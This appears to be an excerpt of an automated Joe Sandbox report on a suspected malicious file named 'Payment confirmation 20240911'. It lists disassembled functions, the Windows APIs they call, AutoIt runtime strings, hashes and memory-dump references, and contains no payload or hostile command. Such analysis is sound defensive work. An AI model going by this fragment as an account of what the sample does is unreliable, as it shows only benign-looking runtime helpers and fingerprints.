                                          • Opcode Fuzzy Hash: c3cac57241a5c251e9116af0e5402f8bbd65f64aefd1da95371f7dce05355a68
                                          • Instruction Fuzzy Hash: 8D012671A41109BBDB08EBA8C911EFF33EC9F21604F540124E503F3284DA248E099361
                                          Function 0134F0A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0135F352,?,?,?), ref: 0134F115
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0134F0FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: LongWindow$MessageProcSend
                                          • String ID: `"u
                                          • API String ID: 982171247-810275233
                                          • Opcode ID: f77600396aa1874f6efc5e4a65f6ef6ce8c5758cb7340e4c85677f3afdb71ed0
                                          • Instruction ID: c729f3ce94c4491d83744e4364632dbf0e0f214f9c51747a0dc1c2d43faba778
                                          • Opcode Fuzzy Hash: f77600396aa1874f6efc5e4a65f6ef6ce8c5758cb7340e4c85677f3afdb71ed0
                                          • Instruction Fuzzy Hash: 0B018435200214ABDB21AF5DDC48F6A7FAEFB8A368F084558F9560B6E0C771A812DB51
                                          Function 013059FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: 2u
                                          • API String ID: 3494438863-169037360
                                          • Opcode ID: c57597181624c5969335003702d37b090a96d0a03c155b05a2e1263a72fa0b4a
                                          • Instruction ID: f586705e4b1bbac2f98497eef01378dfacfea1ac26d0c7a9b15b4562c262f105
                                          • Opcode Fuzzy Hash: c57597181624c5969335003702d37b090a96d0a03c155b05a2e1263a72fa0b4a
                                          • Instruction Fuzzy Hash: B6F0317121C3125EFB378A5DB8A1B633AE8A744738F44551AE105EB6C9E77098818F98
                                          Function 0132804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 7c19b4ed09114e545afeac861fcfa45c8a93fa7fe796fbd14b462f52639a450b
                                          • Instruction ID: aa4ac9160d7644fae93db83ee8acd374d08340548c40065633d075a0c0e9e59d
                                          • Opcode Fuzzy Hash: 7c19b4ed09114e545afeac861fcfa45c8a93fa7fe796fbd14b462f52639a450b
                                          • Instruction Fuzzy Hash: F1E0D83760022927D721EAAAAC49ED7FBACFB51778F000066E954E3141D670954187D0
                                          Function 0131B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MessageBoxW.USER32 ref: 0131B36B
                                            • Part of subcall function 01302011: _doexit.LIBCMT ref: 0130201B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: 2282c7a22433152012ffd04fff91589dda746a22b39a6b65157e3ec2c6c02fc1
                                          • Instruction ID: 9a0d10569b0291b6d988433dfa683dc3f4923c86ea6d8d602f3ab87d5b5eb9e0
                                          • Opcode Fuzzy Hash: 2282c7a22433152012ffd04fff91589dda746a22b39a6b65157e3ec2c6c02fc1
                                          • Instruction Fuzzy Hash: CED0123238531932D61A22DE6C1AFD676C84F15B99F004419FF4C651D5CAD6949042D9
                                          Function 0135BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0135BAB8
                                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0135BCAB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: DirectoryFreeLibrarySystem
                                          • String ID: WIN_XPe
                                          • API String ID: 510247158-3257408948
                                          • Opcode ID: ae9a6ec680a4020ebdb270a6de79c48c91c177030f759c1de0e48f8b1e562579
                                          • Instruction ID: 8b54a38dc0cc4dc6f8e696ac60d226d7b95f6fca45c140e38dd34ea9c46eade6
                                          • Opcode Fuzzy Hash: ae9a6ec680a4020ebdb270a6de79c48c91c177030f759c1de0e48f8b1e562579
                                          • Instruction Fuzzy Hash: 9EE03270C1410DEFEBA1DBA8C845AEDFBBDBB08705F00C496E922B2058C7718A00CF21
                                          Function 01348495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32 ref: 0134849F
                                          • PostMessageW.USER32 ref: 013484B2
                                            • Part of subcall function 01328355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 013283CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 925a89e9742b80f860f8658c19543435639a90d5ce179e4cb04b96d31347c49b
                                          • Instruction ID: 745a1bca0360129d979a0cd82b674fe4e72efb176e309e39cf0e083a9abef489
                                          • Opcode Fuzzy Hash: 925a89e9742b80f860f8658c19543435639a90d5ce179e4cb04b96d31347c49b
                                          • Instruction Fuzzy Hash: 9AD0237334431077D73076709C4FFC36548AF18710F000818F349551D0C4E47800C350
                                          Function 013484C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32 ref: 013484DF
                                          • PostMessageW.USER32 ref: 013484E6
                                            • Part of subcall function 01328355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 013283CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 08527f9ae379d41b1b55f875c3b06e8080719304e091ad8bad5a484c945a460b
                                          • Instruction ID: 68bbaf655772853b1d5834358fe85f37bf620705253f9ed9bf9256e6e53a65e8
                                          • Opcode Fuzzy Hash: 08527f9ae379d41b1b55f875c3b06e8080719304e091ad8bad5a484c945a460b
                                          • Instruction Fuzzy Hash: ACD022733843107BEB31B6B09C4FFC36648AB2CB20F000828F389AA2D0C8E4B800C364